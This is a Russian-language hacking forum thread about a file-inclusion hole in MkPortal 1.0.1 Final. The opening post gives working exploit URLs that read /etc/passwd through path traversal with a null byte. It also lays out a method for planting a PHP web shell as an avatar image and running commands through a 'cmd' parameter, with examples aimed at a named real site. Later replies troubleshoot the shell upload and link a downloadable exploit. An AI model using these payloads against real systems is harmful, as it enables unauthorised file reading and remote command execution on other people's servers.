• XSS.stack #1 – первый литературный журнал от юзеров форума

MkPortal

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
MkPortal 1.0.1 Final - Remote command execution
http://news.xss.pro/mkport.jpg
Уязвимость находится в сценарии index.php и позволяет получить содержимое любого файла (кроме .php).

Код:
http://site.com/index.php?ind=../../../../../../../../../../../../etc/passwd%00

С помощью данного бага становится элементарным получить полноценный веб-шелл на системе. Алгоритм: регистрируемся на форуме (он идет в комплекте вместе с движком), заливаем в качестве аватара картинку, содержащую код веб-шелла и вызываем её вышеописанным способом, добавляя необходимые параметры.

Пример:
Код:
http://blackrose.nl/?ind=../../../../../../../../../../../../etc/passwd%00
http://blackrose.nl/?ind=../../forum/uploads/AVATAR_name.gif%00&cmd=ls -la

Источник: web-hack
 
одно не пойму, если в картинку jpg добавить php-шелл то она не закачиваеться, если переименовать php-шелл в jpg, то заливаеться в аватары, но нифига не работает. кто может пояснить.
 
Подключение произвольных файлов в MKPortal 1.0.1 Final
Эксплоит
:zns5: Скачать|Download
Кстати, весьма забавно. Пост Винукса числится почти годичной давностью. Интересно, автор бага нашел новую вариацию или просто вкурил бамбук :) ?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх